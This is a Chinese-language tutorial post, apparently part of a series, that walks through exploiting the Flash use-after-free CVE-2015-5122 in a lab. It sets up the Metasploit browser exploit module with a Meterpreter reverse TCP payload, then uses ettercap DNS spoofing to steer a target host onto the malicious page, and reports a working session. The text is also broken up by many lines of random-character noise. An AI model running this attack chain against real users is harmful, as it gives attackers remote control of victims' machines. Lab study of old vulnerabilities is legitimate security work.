) A, U4 P" D/ [9 r) ~( R! F7 @0 }4 V
二、cve2015-5122漏洞实例演示虚拟机
% T" T! h: @' N: D ! Q: l( s) H/ Q: E: P5 o
$ g1 C0 ~; x2 Z. F) E 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
$ t+ j+ e2 A/ V, R4 Q& _; H
# w& w9 I6 k- c# x5 {; A8 R! @7 [
# Z' @! r7 e- k: o6 v) A. i search cve-2015-5122如图: 7 R$ @# r3 _* M$ d
+ s' }/ W3 j3 D1 A
9 b0 J$ l! d0 K; j1 m! B
* m8 e& r8 f; l* z
5 d8 |5 e* h2 g; N) R
# k7 D- p2 \& ?( S% N: T2 s 下面我们敲如下命令: 9 |/ h3 o( m' F" J( U j# Q
1 C$ m* N- J: K6 `. D& Y/ T* ]* |$ M1 Z2 F- f7 V
use exploit/multi/browser/adobe_flash_opaque_background_uaf
" R1 g1 I$ V; `/ i
- `, M% y% O& U, o+ t: Z) ^2 b( X* a; K( j5 [- I. @
set PAYLOAD windows/meterpreter/reverse_tcp
/ o0 Z3 P, t4 x" b ; B2 [' f# L8 a# @8 Y. l, q
D# A. T+ }+ T9 o- }
set LHOST 192.168.0.109 ( \2 G) E( O+ ~4 z4 ?! Z
$ |+ l) I2 h7 u7 `& u3 c/ B/ B E, |2 Y) h
set URIPATH / /*根目录*/
: C4 g+ F6 q" R $ V- q/ \+ A$ B1 x5 O
0 K* T) u" S5 x& [8 k6 H- K4 ~
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 * y3 @% W* D5 n
, [- H: l6 B1 }+ c- ?8 U) l a$ ]
set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 1 {8 Q# j7 U q3 e
, o4 U& i* Z$ F. s( l+ }$ L s
2 A. R# f/ j" v# L8 [, `' D6 } 然后show options如图: 3 V- x. `1 a2 x$ P
* r' a1 N; l" W$ q* V$ o9 _
0 R9 s1 w' T$ i$ z. c& e; c$ s0 t
3 @: x) v k1 ]/ N. y
4 e! q/ q/ y) m. m( b
9 p& B. V" ^) o7 O; r; b1 j J2 T: e# [ 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图: / g3 ~. o' P) M8 S1 V2 ]/ m( f6 {
/ Q; i* u& w: L2 p1 j
3 ]; n4 C+ v# D" B$ o9 R% a
7 o* c( d7 |% F. D f n 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
, Z5 u) e8 O9 Z7 i) K % x0 p2 @5 J6 B2 k: o1 _
/ ^) m3 `* C/ y
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
2 t$ j9 M+ @) Y: H - F m h; F( z4 _/ V/ T; S# F
8 m5 u& ?2 C$ w- l5 c
! U1 l% B" p/ W' \; R
1 a4 a8 u$ W5 k% E* k" O
/ j4 G w4 s) |/ n
成功了,这时候我们断开ettercap,如图: * _ M; z* b8 W+ K6 {9 C0 \9 G
4 ?) k/ t* h+ I! T" O# T- a
4 h; Q1 {3 |7 F* ?) v* P# z 9 k) h; g( a# I9 r6 J y
* M: v6 q2 h, _7 j; F6 ]) R+ o4 G8 p6 c2 Q9 K
Screenshot如图:
, n1 ^" K: T9 L# [- o4 v8 U* C
; I V( n& p I) \5 b, [( j( o1 j8 b% U5 z* C0 p, d, y: B
' @+ ?4 u7 N* e. M
; M: J, o- k1 Y% |/ `" d
) e9 X- I8 C% \& u' ?& u, U( k
. @, d; D. T8 j" R) k6 `" g |